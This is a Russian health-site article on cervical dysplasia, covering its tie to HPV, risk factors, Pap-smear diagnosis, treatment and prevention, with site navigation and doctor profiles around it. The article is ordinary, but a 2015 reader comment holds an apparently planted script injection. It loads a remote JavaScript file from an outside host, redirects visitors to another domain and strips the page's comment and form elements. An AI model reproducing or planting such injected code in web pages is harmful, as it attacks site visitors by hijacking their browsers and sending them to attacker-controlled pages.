Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Рак половым путем?  >>  Рак половым путем?
 
Обратная связь
 

Рак половым путем?

Размер шрифта
11 августа 2011 07:01
  • google_analytics: false
  • Нравится

Сифилис, гонорея и половой герпес – верные спутники беспорядочных половых связей и секса без презерватива. Однако не все из нас знают, что в этой дружной компании могут оказаться и онкологические заболевания. К примеру, дисплазия шейки матки.

Секс

Виктор Миронов / «Здоровье инфо»

Дисплазия шейки матки – это предраковое состояние, при котором аномальный рост клеток происходит на поверхности слизистой оболочки матки. Связанная с передаваемым половым путем вирусом папилломы человека (ВПЧ), дисплазия обычно развивается у женщин до 30 лет, но может проявиться в любом возрасте.

Как правило, на ранних этапах она развивается бессимптомно и выявляется мазком Папаниколау. Это заболевание лечится, однако если дисплазию вовремя не выявить, последствия могут быть тяжелыми.

Дисплазия в легкой форме нередко может пройти и без лечения, требуется лишь регулярное наблюдение у врача. Но если болезнь протекает тяжело, то необходимо хирургическое удаление болезнетворных клеток.

Причины

Часто у больных дисплазией шейки матки обнаруживается и папилломовирус. Обычно иммунная инфекция с этим вирусом справляется, но у некоторых женщин вирус сохраняется, способствуя развитию дисплазии.

Папилломовирус передается половым путем, можно им заразиться и при обычном телесном контакте. Хронический ВПЧ чаще всего встречается у курильщиков, да и дисплазия у них принимает более тяжелую форму. Это связано с тем, что курение подавляет иммунную систему. К другим факторам, способствующим развитию хронического ВПЧ и дисплазии, относится употребление иммуносупрессивных препаратов при лечении некоторых заболеваний, а также трансплантация органов.

Факторы риска

Секс

Основной фактор риска, как мы отметили выше, это наличие ВПЧ. Также к факторам риска относятся:

  • ранняя половая жизнь
  • частая смена партнеров
  • секс с необрезанным партнером.

Диагностика

Гинекологический осмотр не всегда может выявить дисплазию; для этого, как уже было сказано выше, необходим мазок Папаниколау. Он помогает выявить наличие болезни и ее форму, но для дальнейших выводов о видах и форме лечения требуются дополнительные тесты:

  • кольпоскопия, осмотр влагалища при помощи специального прибора – кольпоскопа
  • выскабливание эндоцервикса – процедура, которая помогает выявить аномальные клетки
  • конусная биопсия, при которой на анализ берется ткань, чтобы исключить или подтвердить наличие рака.

Лечение

Лечение дисплазии шейки матки зависит от многих факторов, таких как степень тяжести заболевания и возраст пациента. При легкой дисплазии проводится только регулярный мониторинг заболевания с регулярными мазками. Более тяжелые формы лечатся преимущественно хирургическим путем, при этом используются такие методы, как хирургическое вмешательство, криохирургия или лазерная хирургия.

Так как лечение почти всегда связано с рисками, такими как осложнения беременности, после операции за больными ведется наблюдение в течение некоторого времени.

Профилактика

Женщины могут снизить риск заболевания дисплазией, отказавшись от случайных половых связей и сексуальных приключений, ранней половой жизни и частой смены партнеров. Использование презервативов снижает риск заболевания ВПЧ (и последующей за ним дисплазии) на 70%.

Также профилактические меры включают отказ от курения и регулярный скрининг матки. Кроме того, сегодня существует ряд вакцин, которые могут уберечь от некоторых распространенных штаммов ВПЧ.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

01 июля 2015 в 00:09

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Специализированное питание как важный фактор лечения и реабилитации пациентов с онкологическими заболеваниями   Сигналы SOS вашего организма   Сладкие напитки вызывают рак матки   Если не чистить зубы, будет рак  
18 октября 2012Новый тест скажет, будет у вас рак или нет 09 августа 2012Раковые клетки теперь не смогут скрыться!
 
18 июля 2012Самое слабое место у женщин 03 июля 2012Созданы лекарства, которые обучают организм убивать рак
 

Слайдшоу

1
Рак, от которого спасает беременность! Вся правда о раке яичников
Еда против рака. Часть 3
Факторы, которые влияют на возникновение рака

Тесты

Что вы знаете о раке груди?
Как облегчить менопаузу?
Что вы знаете о ногтях?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.